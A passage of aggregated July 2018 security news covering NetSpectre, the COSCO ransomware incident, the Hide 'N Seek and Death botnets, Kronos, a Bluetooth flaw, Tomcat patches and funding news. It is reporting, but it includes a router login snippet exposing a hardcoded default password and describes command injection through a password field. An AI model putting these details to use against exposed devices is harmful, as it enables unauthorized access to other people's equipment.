“Depending on the gadget location, the attacker has access to either the memory of the entire corresponding application or the entire kernel memory, typically including the entire system memory.” the researchers said.

An attacker just needs to send a series of specially crafted requests to the target machine and observe the timing difference in the network packet response time to leak a secret value from the machine’s memory.

“In contrast to local Spectre attacks, where a single measurement can already be sufficient, NetSpectre attacks require a large number of measurements to distinguish
bits with a certain confidence” continues the paper.

The expert reported the NewSpectre attack to Intel in March and the tech giant addressed the issue with the first set of security patches it has released.

Shipping Giant COSCO Hit by Ransomware
26.7.2018 securityweek

Chinese state-owned shipping and logistics company COSCO was reportedly hit by a piece of ransomware that disrupted some of its systems in the United States.

COSCO, one of the world’s largest shipping companies, described the incident as a “local network breakdown” in the Americas region. The firm says it has suspended connections with other regions while it conducts an investigation.

“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,” COSCO stated.

While COSCO’s statement does not mention a cyberattack, the company told some news outlets that the disruptions are the result of a ransomware attack.

Cosco responds to ransomware attack

According to researcher Kevin Beaumont‏, the impacted infrastructure hosts COSCO’s website (cosco-usa.com), phone and email systems, and WAN and VPN gateways. The expert pointed out that the company resorted to using Twitter and Yahoo email accounts to communicate with customers.

The company’s U.S. systems still appear to be offline at the time of writing. It’s unclear if this was a targeted attack or if COSCO’s systems became infected as part of an opportunistic ransomware campaign.

If COSCO was truly hit by ransomware – it’s not uncommon for companies to misclassify cyber threats in the initial phases of an investigation – it would not be the first time a major shipping company has fallen victim to this type of attack.

One of the victims of last year’s NotPetya campaign, which caused losses of hundreds of millions of dollars for several major companies, was Danish shipping giant A.P. Moller–Maersk, which revealed that the incident forced its IT team to reinstall software on its entire infrastructure, including 45,000 PCs and 4,000 servers.

As a result of the attack, Maersk employees had to manually process 80 percent of the work volume while systems were being restored and the incident cost the company over $300 million.

Hide ‘N Seek Botnet Targets Smart Homes
26.7.2018 securityweek BotNet

The infamous Hide ‘N Seek botnet is now targeting vulnerabilities in home automation solutions, network security firm Fortinet says.

First observed in January this year, the botnet originally targeted home routers and IP cameras, and had a decentralized, peer-to-peer architecture. By May, the malware had infected over 90,000 unique devices and was targeting far more device types and architectures.

Earlier this month, Qihoo 360's NetLab researchers revealed that the malware also included exploits for AVTECH webcams and Cisco Linksys routers, along with support for OrientDB and CouchDB database servers.

Fortinet new reports that the latest version of the malware has a configuration made up of 110 entries and 9 exploits. More importantly, Fortinet's security researchers reveal, Hide ‘N Seek has added an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability.

The malware implemented the exploit less than a week after it became public, and the same happened with the exploit for the Apache CouchDB remote code execution flaw, Fortinet reveals. The malware also targets a remote code execution in the Belkin NetCam devices.

HomeMatic is a provider of Smart Home devices from the German manufacturer eQ-3. The botnet is targeting the system’s central element, which provides control, monitoring, and configuration options for all HomeMatic devices. This may be the moment when malware starts hacking your house.

“[Hide ‘N Seek] has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet notes.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits.

Apache OpenWhisk Flaws Allowed Attackers to Overwrite Code in IBM Cloud
26.7.2018 securityweek

Researchers discovered that two vulnerabilities in the Apache OpenWhisk serverless cloud platform could have allowed malicious actors to overwrite and execute arbitrary code.

Apache OpenWhisk is an open source platform designed to execute code in response to events. The platform handles infrastructure and servers so that users can focus on developing their applications.

IBM’s Cloud Functions function-as-a-service (FaaS) platform is based on Apache OpenWhisk, which made it vulnerable to attacks.

One of the vulnerabilities, tracked as CVE-2018-11757, was discovered by researchers at PureSec. Another issue, CVE-2018-11756, was identified during an investigation into CVE-2018-11757.

Both Apache OpenWhisk developers and IBM have created patches that should prevent attacks.

According to PureSec, the vulnerabilities could have allowed an attacker – under certain conditions – to overwrite the source code of a function being executed in a container and influence subsequent executions in the same container, even if they were carried out by a different user.

Successful exploitation of the vulnerabilities could have resulted in sensitive data getting leaked, or the execution of rogue logic in parallel to a legitimate action’s original logic.

“In addition, an attacker may launch similar attacks in parallel, and in turn affect additional containers, turning the attack into a more persistent or wide-spread threat,” PureSec explained.

Specifically, PureSec says an attacker could have exploited the flaws to obtain sensitive user data, such as passwords, modify or delete information, mine cryptocurrencies, or launch distributed denial-of-service (DDoS) attacks.

OpenWhisk runs each action (function) inside a Docker container and interaction with the function involves a REST interface accessible over port 8080. Each container has two endpoints: /init, which receives the code to be executed, and /run, which receives the arguments for the action and executes the code.

If an attacker could find a vulnerability in the function, such as a remote code execution flaw, they may have been able to force it to launch a local HTTP request to the /init interface on port 8080 and overwrite its source code.

PureSec has published a technical advisory, a blog post, and a video showing how an attack worked against IBM Cloud Functions.

“[PureSec] research showed that for the affected function runtime, an attacker that successfully exploits an already vulnerable function — say by remote code execution or hijacking parameters — may replace the running code inside the container so that subsequent function invocations that reuse that container are now using the new code,” said Rodric Rabbah, one of the creators of Apache OpenWhisk.

“The Apache OpenWhisk community responded quickly to the PureSec research report and audited all the runtimes that are available for functions. This includes Node.js, Python, Swift, Java, PHP, and upcoming additions Ruby and Ballerina. All of the runtimes now detect when a function is attempting to mutate itself from inside a running container (in the way described by PureSec), and uniformly generate a warning message so that the developer can observe and respond to such attempts if their functions are vulnerable to code exploits,” Rabbah added.

US, Australia Work to Improve Cyber Capabilities
26.7.2018 securityweek Cyber

The United States and Australia have signed an agreement that will enable the two allies to conduct research and development to advance their combined cyber capabilities, officials said Tuesday.

Nowhere "is the need for innovation more critical than in cyber, which continues to be a pervasive threat to our militaries and to our businesses," Australian Defence Minister Marise Payne said at a US-Australian summit in California.

US Defense Secretary Jim Mattis said the two countries had signed a memorandum of understanding "to deepen cybersecurity cooperation."

The move comes amid ongoing hacking thefts of sensitive information from military networks, and Russia's continued attempts to subvert democracy in America and elsewhere.

On a separate topic, an Australian reporter asked Mattis whether he thought the Australian navy should conduct a so-called "freedom of navigation" operation to challenge Chinese claims of sovereignty on militarized islets in the South China Sea.

The longstanding issue poses a dilemma for Canberra, with Australian lawmakers debating how much the country should align itself with its longstanding ally America, or pay more heed to the desires of China, its biggest trade partner.

"As far as freedom of navigation decisions by Australia, that's a sovereign decision by a sovereign state," Mattis said.

"We'll just leave that decision with the people of Australia, which is exactly where it belongs."

US Secretary of State Mike Pompeo and his Australian counterpart Julie Bishop also attended the annual summit.

Pompeo was asked about US views of holding Russia to account over its role in the 2014 shootdown of Malaysia Airlines flight MH-17 over Ukraine, when 298 people, including 38 Australian citizens and residents, were killed.

"We need the Russians to continue to be held accountable for that," Pompeo said.

"We take this matter seriously and we committed over these last two days, as we have for the last months, to continue to support every effort through the Joint Investigative Team to hold the perpetrators for this heinous activity accountable."

Customer Identity and Access Management Firm LoginRadius Raises $17 Million
26.7.2018 securityweek IT

Vancouver, Canada-based customer identity and access management (cIAM) firm LoginRadius has raised $17 million Series A funding led by ForgePoint Capital and Microsoft's venture fund, M12.

Founded in 2012 by Rakesh Soni (CEO) and Deepak Gupta (CTO), LoginRadius has concentrated on cIAM -- initially as a social login provider, but now the provider of a multi-faceted, cloud-based, full-function cIAM platform. In its six years it has grown largely without external capital funding (previously raising a total of $2.3 million in initial and seed funding); and it has achieved triple digit growth in its last two years.

LoginRadius LogoWith the demand for customer (as opposed to enterprise) identity and access management growing rapidly, the new funding is designed to ensure that the firm can expand to meet potential requirements. Driving this growth is the ongoing digital transformation of business. Commercial enterprises are no longer satisfied with identity alone, but seek complete identity profiles of their customers in order to provide a more personalized service.

LoginRadius Logo

This makes cIAM a very different requirement to enterprise IAM. While enterprise IAM is concerned with validating the identity of a relatively small and finite number of known company employees, cIAM needs to handle the identity and profile of an infinite number of potentially worldwide internet customers.

"In customer identity you do not control the identity," Soni told SecurityWeek: "you just define it. Control remains with the customers who decide whether they want to keep the identity, destroy the identity, whether they want to access 20 of your brands or just one. And because the system faces outwards rather than inwards, the compliance requirements that are absent in employee identity becomes extremely critical -- especially, for example, with GDPR and the other privacy regulations popping up throughout the world."

The scale is very different. "While most companies have a maximum of a few hundred thousand employees," he continued, "one of our biggest clients has 50 million identities. Those people can access the client from anywhere on the planet, and they need the system to be up and running 24/7. For employee IAM, if the system is down for ten or 15 minutes (especially out of business hours) the impact is minimal. But in the case of cIAM even small downtimes can damage revenue and impact brand satisfaction."

These requirements, he suggests, demand a cloud-based solution. "With increasing customer experience expectations and growing cybersecurity threats, enterprises need a modern cloud-based identity platform that can be the foundation for digital transformation and provide peace of mind when it comes to security. This funding is a testament to LoginRadius' ability to deliver on this promise to our customers and sets the foundation for our future growth."

The firm already has offices in London, San Francisco, Sydney, and Jaipur; and plans to double its workforce over the next 12 months.

"Customer identity is at the intersection of security, digital business and compliance. This requires significant expertise to build and maintain in-house, resulting in extended go-to market time," said Deepak Gupta. "LoginRadius provides the answer to this critical challenge with its out-of-the-box solution."

The LoginRadius cloud platform is built with RESTful APIs and open sourced SDK libraries to allow developers to implement authentication, login interfaces and web SSO without worrying about back-end capabilities such as data management, disaster recovery, performance, system availability and scalability. It already serves more than 700 million identities, and handles 7.5 billion API calls per month.

"Forward-thinking companies are looking for secure, cloud-based identity solutions that can serve a global customer base and handle complex scenarios," commented Nagraj Kashyap, corporate vice president at Microsoft and global head of M12. LoginRadius is "delivering on their promise to simplify customer identity management, which allows enterprise companies to more easily achieve their digital transformation ambitions."

Researchers Resurrect Decade-Old Oracle Solaris Vulnerability
26.7.2018 securityweek

One of the Solaris vulnerabilities patched by Oracle with its July 2018 Critical Patch Update (CPU) exists due to an ineffective fix implemented by the company for a flaw first discovered in 2007.

The new vulnerability, identified by researchers at Trustwave and tracked as CVE-2018-2892, impacts the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The security hole has been classified as high severity due to the fact that it allows an attacker to execute code with elevated privileges, but it cannot be exploited remotely without authentication.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation,” Trustwave wrote in an advisory. “The issue is the result of a signedness bug in the bounds checking of the 'SDBC_TEST_INIT' ioctl code sent to the '/dev/sdbc' device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

According to Trustwave, the vulnerability was originally discovered back in 2007 and its details were disclosed in 2009 at the CanSecWest security conference. The root cause of the issue is a combination of several arbitrary memory dereference bugs and an unbounded memory write bug.

Oracle released a patch sometime after the vulnerability was disclosed, but Trustwave discovered that the fix had been ineffective.

Exploitation of CVE-2018-2892 is “almost identical” to the original flaw, the most significant difference being related to the change in architecture between the open source OpenSolaris running on a 32-bit system and Oracle Solaris 11 running on a 64-bit system. Oracle discontinued OpenSolaris after acquiring Sun Microsystems in 2010.

Researchers believe the new vulnerability may exist due to some code introduced for testing purposes.

Another vulnerability patched by Oracle with its latest CPU is CVE-2018-2893, a critical flaw that allows attackers to remotely take control of WebLogic Server systems. The security hole has already been exploited in the wild to deliver cryptocurrency miners, backdoors and other types of malware.

Kronos Banking Trojan Has Returned
26.7.2018 securityweek

The Kronos banking Trojan is showing renewed strength and has been very active over the past several months, Proofpoint security researchers warn.

Kronos malware was first discovered in 2014 and maintained a steady presence on the threat landscape for a few years, before largely disappearing for a while. It uses man-in-the-browser (MiTB) attacks and webinjects to modify accessed web pages and steal user credentials, account information, and other data. It can also log keystrokes and has hidden VNC functionality.

Last year, the United States Federal Bureau of Investigation said that Kronos was built and distributed by British researcher Marcus Hutchins, who goes by the online handle of MalwareTech and who is known for stopping the WannaCry ransomware attack.

The new Kronos samples, which were observed in campaigns targeting users in Germany, Japan, and Poland, are connecting to a command and control (C&C) domain on the Tor network. There’s also speculation that the malware might have been rebranded to Osiris, but no hard evidence on this has emerged so far.

The first campaign carrying the new Kronos samples was observed on June 27, targeting German users with malicious documents attached to spam emails. The documents carried macros to download and execute the malware and the SmokeLoader Trojan downloader was used in some cases.

Targeting Japan, the second campaign was observed on July 13 and involved a malvertising chain. Malicious ads took users to a site where JavaScript injections redirected to the RIG exploit kit, which delivered SmokeLoader. The downloader would then drop Kronos onto the compromised machines.

The Poland campaign started on July 15 and involved fake invoice emails carrying malicious documents that attempted to exploit CVE-2017-11882 (the Equation Editor vulnerability) to download and execute Kronos.

The Kronos samples observed in all three campaigns were configured to use .onion domains for C&C purposes. The researchers also observed that webinjects were used in the German and Japanese campaigns, but none was seen in the attacks on Poland.

A fourth campaign observed on July 20 appeared to be work in progress. The Kronos samples were once again configured to use the Tor network and a test webinject was spotted.

The 2018 Kronos samples feature extensive code and string overlap with the older versions, abuse the same Windows API hashing technique and hashes and the same string encryption technique, leverage the same webinject format, and feature the same C&C encryption mechanism and C&C protocol and encryption.

The C&C panel file layout is also similar to the older variants and a self-identifying string is also present in the malware. The major change, however, is the use of .onion C&C URLs and the Tor network to anonymize communications.

There is also some evidence to suggest that the malware might have been rebranded to Osiris (the Egyptian god of rebirth).

The new malware is being advertised on underground forums as packing capabilities that overlap with those observed in the new version of Kronos and as having about the same size (at 350 KB), and the researchers also observed a filenaming scheme in Kronos that appears to suggest a connection with Osiris.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape. […] While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,” Proofpoint concludes.

Twitter Curbs Access for 143,000 Apps in New Crackdown
26.7.2018 securityweek

Twitter said Tuesday it had removed more than 143,000 apps from the messaging service since April in a fresh crackdown on "malicious" activity from automated accounts.

The San Francisco-based social network said it was tightening access to its application programming interfaces (APIs) that allows developers to make automated Twitter posts.

"We're committed to providing access to our platform to developers whose products and services make Twitter a better place," said Twitter senior product management director Rob Johnson.

"However, recognizing the challenges facing Twitter and the public -- from spam and malicious automation to surveillance and invasions of privacy -- we're taking additional steps to ensure that our developer platform works in service of the overall health of conversation on Twitter."

Johnson offered no details on the revoked apps, but Twitter has been under pressure over automated accounts or "bots" which spread misinformation or falsely amplify a person or political cause.

"We do not tolerate the use of our APIs to produce spam, manipulate conversations, or invade the privacy of people using Twitter," he said.

"We're continuing to invest in building out improved tools and processes to help us stop malicious apps faster and more efficiently."

As of Tuesday, any developer seeking access to create a Twitter app will have to go through a new application process, providing details of how they will use the service.

"We're committed to supporting all developers who want to build high-quality, policy-compliant experiences using our developer platform and APIs, while reducing the impact of bad actors on our service," Johnson said.

Automated accounts are not always malicious -- some are designed to tweet our emergency alerts, art exhibits or the release of a Netflix program -- but "bots" have been blamed for spreading hoaxes and misinformation in a bid to manipulate public opinion.

Chrome Now Marks HTTP Sites as "Not Secure"
26.7.2018 securityweek Security

The latest version of Google's Chrome web browser (Chrome 68) represents another step the search giant is making toward a more secure web: the browser now marks HTTP sites as “Not Secure.”

The change comes three and a half years after the Chrome Security Team launched the proposal to mark all HTTP sites as affirmatively non-secure, so as to make it clearer for users that HTTP provides no data security.

When websites are loaded over HTTP, the connection is not encrypted, meaning not only that attackers on the network can access the transmitted information, but also that they can modify the contents of sites before they are served to the user.

HTTPS, on the other hand, encrypts the connection, meaning that eavesdroppers can’t access the transmitted data and that user’s information remains private.

Google, which has been long advocating the adoption of HTTPS across the web, is only marking HTTP pages with a gray warning in Chrome. Later this year, however, the browser will display a red “Not Secure” alert for HTTP pages that require users to enter data.

The goal, however, is to incentivize site owners to adopt HTTPS. For that, Google is also planning on removing the (green) “Secure” wording and HTTPS scheme from Chrome in September 2018.

This means that the browser will no longer display positive security indicators, but will warn on insecure connections. Starting May 1, Chrome is also warning when encountering certificates that are not compliant with the Chromium Certificate Transparency (CT) Policy.

“To ensure that the Not Secure warning is not displayed for your pages in Chrome 68, we recommend migrating your site to HTTPS,” Google tells website admins.

According to Google’s Transparency Report, HTTPS usage has increased considerably worldwide, across all platforms: over 75% of pages are served over an encrypted connection on Chrome OS, macOS, Android, and Windows. The same applies to 66% of pages served to Linux users.

To help site admins move to HTTPS, the Internet giant has published a migration guide that includes recommendations and which also addresses common migration concerns such as SEO, ad revenue and performance impact.

In addition to marking HTTP sites as Not Secure, Chrome 68 includes patches for a total of 42 vulnerabilities, 29 of which were reported by external researchers: 5 High severity flaws, 19 Medium risk bugs, and 5 Low severity issues.

The 5 High risk issues include a stack buffer overflow in Skia, a heap buffer overflow in WebGL, a use after free in WebRTC, a heap buffer overflow in WebRTC, and a type confusion in WebRTC.

The remaining flaws included use after free, same origin policy bypass, heap buffer overflow, URL spoof, CORS bypass, permissions bypass, type confusion, integer overflow, local user privilege escalation, cross origin information leak, UI spoof, local file information leak, request privilege escalation, and cross origin information leak.

Car Sharing Apps Vulnerable to Hacker Attacks: Kaspersky
26.7.2018 securityweek

Researchers at Kaspersky Lab have analyzed over a dozen mobile applications provided by car sharing companies and discovered serious security holes that can be exploited to obtain personal information and even steal vehicles.

The security firm’s employees have investigated a total of 13 car sharing apps for Android. The targeted applications are used in the U.S., Europe and Russia, and they have been downloaded more than 1 million times from Google Play.

Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users short one-time verification codes. This, combined with the lack of a limitation mechanism for the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than the ones of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”

Big Tech Firms Agree on 'Data Portability' Plan
26.7.2018 securityweek IT

Facebook, Google, Microsoft and Twitter unveiled plans Friday to make it easier for users to take their personal data and leave one online service for another.

The "Data Transfer Project" revealed by the companies responds to concerns about the growing influence of internet platforms and internet user concerns about control of their personal information shared online.

"Users should be in control of their data on the web, part of this is the ability to move their data," the companies said on the project website.

Data portability has been a goal of many privacy activists, and is enshrined in some country regulations including Europe's new General Data Protection Regulation.

Currently, people can download their data from an online service, without a guarantee it will be possible or feasible to upload the information to a new service.

The situation can result in people feeling anchored to a service or app, even if they are unhappy with it or an enticing option arises, because of photos, contacts, posts and other accumulated data.

"Making it easier for individuals to choose among services facilitates competition, empowers individuals to try new services and enables them to choose the offering that best suits their needs," the project said at its website.

"There are many use cases for users porting data directly between services, some we know about today, and some we have yet to discover."

Reasons for shifting personal data could include abandoning an old service, trying a new one, or simply backing up information to keep it safe.

The project was formed two years ago and remains in a development phase.

Disclosure of the effort comes amid heightened scrutiny over the potential of internet companies to abuse positions of power and the right of people to control their online data.

Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender then it disappeared for a few days, and appeared again a few week later infecting in less than a weeks more than 20,000 devices.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices, recently researchers from Qihoo 360’s NetLab discovered the bot was also targeting AVTECH webcams, Cisco Linksys routers, OrientDB and CouchDB database servers.

Hide â?˜N Seek timeline

Fortinet experts have compared three different versions of the bot across the time.

The security firm reports that the latest version of the bot has a configuration composed up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability, the malicious code allows the botnet to target devices in smart homes controller by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to expand usage of publicly available exploits

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”

CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue tracked as CVE-2018-5383 affects the Secure Simple Pairing and LE Secure Connections features, it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then it can monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.” reads the advisory published by the Bluetooth SIG explained.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification, now it is mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted, it also added that security fixes were already provided to OEM customers.

Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is the CVE-2018-8037, it is an important bug in the tracking of connection closures that can lead to reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Tomcat 9.0.10 and 8.5.32 releases address the vulnerabilities.

Another important issue addressed by the Foundation is the CVE-2018-1336, it is an improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder triggering a Denial of Service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 addresses the vulnerability.

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution .

The Death botnet grows targeting AVTech devices with a 2-years old exploit
25.7.2018 securityaffairs BotNet

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.
A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-years old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many products of the vendor currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of payload used by EliteLands is adding accounts with a lifespan of five minutes that execute his payload and then is deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted the EliteLands who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was orginally just to ddos but I have a greater plan on it soon. I dont really use it for attacks only to get customers aware of the power it has.”

Korean Davolink routers are easy exploitable due to poor cyber hygene
25.7.2018 securityaffairs

Davolink dvw 3200 routers have their login portal up on port 88, the access is password protected, but the password is hardcoded in the HTLM of login page.
The story started in 2018 when Anubhav noticed a very basic flaw the routers of the Korean vendor Davolink.

These Davolink dvw 3200 routers have their login portal up on port 88, the access is password protected.

Analyzing the code of the page the expert has noticed a function named “clickApply” that included the password in standard base 64 coding.

function clickApply(sel)
var user_passwd="YWRtaW4=";
var super_passwd="(null)";
document.forms[0].http_passwd.value = encode(document.forms[0].tmp_http_passwd.value);

Davolink dvw
Scanning the Internet for similar devices using the search engine Zoomeye, he discovered more than 50 routers in Korea are exposed only and are accessible providing the hardcoded password.
The expert reported the issue to the vendor that quickly acknowledged it and responded that they have discontinued the product. The vendor added that a working patch is already available.

The expert published the exploit code on exploit-db.

“Many IoT vendors are not doing the basics right as keeping the password in the HTML source, it is a very basic security issue” concluded Anubhav

“and it is a relevant issue as users in Korea are using it”

Gigamon Acquires Network Visibility Startup ICEBRG

24.7.2018 securityweek IT

Network traffic analysis firm Gigamon on Tuesday announced plans to acquire network security startup ICEBRG.

Founded in 2014, Seattle, Washington-based ICEBRG provides a Security-as-a-Service (SaaS) solution designed to help organizations detect threats and gain and leverage network visibility for security operations.

Gigamon's flagship GigaSECURE platform provides visibility into network traffic, users, applications and suspicious activity.

The ICEBRG platform uses sensors deployed at customer locations that stream network traffic metadata to a cloud-based system that helps Security Operations Center (SOC) teams quickly identify threats and act to remediate them.

